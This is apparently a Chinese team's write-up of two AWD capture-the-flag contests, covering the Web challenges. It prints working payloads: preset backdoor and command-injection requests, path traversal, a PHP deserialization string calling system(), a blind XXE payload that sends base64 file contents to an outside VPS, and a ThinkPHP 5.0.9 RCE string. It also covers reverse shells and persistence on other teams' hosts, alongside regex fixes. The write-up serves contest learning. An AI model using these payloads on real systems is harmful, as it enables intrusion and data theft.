感谢星盟安全团队的邀请!
2.9
2月9号星盟安全团队举办的线上AWD,三道Web题,两道pwn题。又学到了很多新姿势。
记录下三道Web题中我们发现的漏洞和做题过程。
Web1
上D盾:
test.php中的预置后门:
赶紧删文件,写个脚本批量打。
payload:http://39.100.119.37:10480/test.php?out=cat /flag
shell()函数的命令执行漏洞
在admin/func.php中存在有漏洞的shell函数:
如何快速发现哪个文件调用了shell函数?
熟悉代码审计的师傅应该知道ctags和在文件夹中搜索这两个功能。
-
ctags就是定位被调用函数的定义文件:image这样就能快速找到定义这个函数的文件所在行。
-
在文件夹中搜索是一般编辑器都有的功能我使用
sublime,在文件夹中搜索shell,很快就发现在哪处调用了该函数image
利用该漏洞需要先登录后台
后台登录账号密码:admin111:admin111
payload:?shell&out=127.0.0.1;cat /flag
修复方案:过滤out参数,如果其含有flag字样,直接exit();(这样不严谨,但当时时间紧迫,先这样处理)
更好的修复方案,shell完成的功能是ping命令,那么我们就使用正则来过滤输入的参数是否是正常的域名或者IP
if (preg_match('/^(?=^.{3,255}$)[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-z0-9A-Z][-a-zA-Z0-9]{0,62})+$|^((25[0-5]|2[0-4]\d|[01]?\d\d?)($|(?!\.$)\.)){4}$/', $target))
Web2
假的预置后门
同Web1一样,在网站根目录下有一个test.php的假后门
一开始D盾扫到还挺兴奋的,但利用起来完全没作用
源码中已经输出了$_、$__、$___的值,跟注释中的$_='assert';完全不一样,大概就是出题人皮了一下。
pass掉。
目录跳转漏洞
admin/grade.php中,接收文件名,并将文件内容输出到浏览器
payload:http://39.100.119.37:21680/admin/grade.php?file=../../../../flag
修复方案:正则匹配..,防止目录遍历
反序列化
login/logout.php
比较简单的反序列化利用
payload:O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:15:"system('cat /flag');";}
修复方案:多余的操作,直接删除unserialize($_POST['un']);
Web3
Web3的MySQL服务一直有问题,直到比赛结束前半个小时才恢复。
盲XXE
loginCheck.php
登录是通过XML传递username和password参数,而传递的xml我们可控,没有回显,盲XXE读取文件。
XML:
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://47.112.16.34/xml.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
%remote;
%send;
]>
<message>aaa</message>
外部DTD文件:
<!ENTITY % start "<!ENTITY % send SYSTEM 'http://47.112.16.34:1337/?%file;'>">
%start;
在VPS上监听 nc -lp 1337 -vv
抓包请求:
VPS接收到请求:
关于盲XXE更多参考学习:https://www.freebuf.com/vuls/207639.html
总结
赛后在群里看了下其他师傅分享的思路,不得不服,被骚到了。。最重要的还是权限维持。
骚思路:
建立软链接文件到/flag
还有发现平台漏洞,拿到所有主机的登录密码:
太强了,向师傅们学习!
3.14
特别感谢星盟安全团队3月的AWD邀请赛!
这次我们团队有几个选手因为有事耽误了,没有参加,导致我们人手不太够。后面环境也出现了不同程度的问题:环境经常崩、无法重置容器等。不过还是特别感谢星盟安全团队,辛苦运维小哥们了!
Web2
Web2是最先开放环境的
前期准备
拷贝源码到本地 -> 上日志监控脚本 -> 上文件监控脚本等等
login.php
直接访问login.php,左下角就存在flag
登录login.php
很多队伍没有修改默认登录账号密码,导致默认登录后拿到flag
主要就是这两个洞在这刷,由于今天人手不太够,也没有怎么维持权限。
Web3
Web3的洞挺多的,就是环境问题导致几个洞用不了,也可能是我们操作不当。
readme
首先前期准备工作做好,源码拷贝下来后发现存在readme.md,我还以为是在GitHub上下载的某个cms,就没有打开这个readme。后来D盾扫到了这个文件存在危险函数,一看,一句话木马。。
傻傻的还以为要寻找文件包含漏洞,要是找到了文件包含,这个文件也早被删了。。知道看到.htaccess的内容,原来可以直接用!赶紧刷一波(很快就没了)
命令执行 反序列化
common目录中的function.php
先把自己的洞给修了,采用正则来匹配输入的是否是合法的IP/域名:
if (preg_match('/^(?=^.{3,255}$)[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-z0-9A-Z][-a-zA-Z0-9]{0,62})+$|^((25[0-5]|2[0-4]\d|[01]?\d\d?)($|(?!\.$)\.)){4}$/', $target))
结果去利用别人的洞的时候,发现怎么使都不成功,试了很多队伍,一致以为是环境问题导致的PHP脚本没有正常执行。。
同目录下 home.php 中存在反序列化漏洞。感觉和上次(2月)的题目很像啊。。
Web1
Web1是黑盒测试,比赛大概进行了半个小时放出Web1的环境。
一上来随便一测,就是个TP环境,报错看下TP版本:5.0.9,直接RCE:
?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=more%20/flag
一开始试的cat /flag,好像返回结果有点问题,就换成了more。
当时没有怎么想着维持权限,只是反弹一个自己团队shell,把洞给修了。
下次遇到这种黑盒的,就直接拿到所有队伍的meterpreter shell,放在后台,这样维权比较方便长久。(希望不会卡。。)
后来莫名访问量.config.php,没想到直接骑上别人的马了,同网站根目录下的jquery.min.js一样,这两个都是软链接文件,链接到/flag。
总结
这次的比赛准备的挺充足的,赛前我也调试过几个通防脚本。只不过有些脚本的作用还是没有充分发挥。
比赛人手不够也导致很被动,,
总之,很感谢星盟安全团队这次锻炼的机会!我们还需要更加努力。
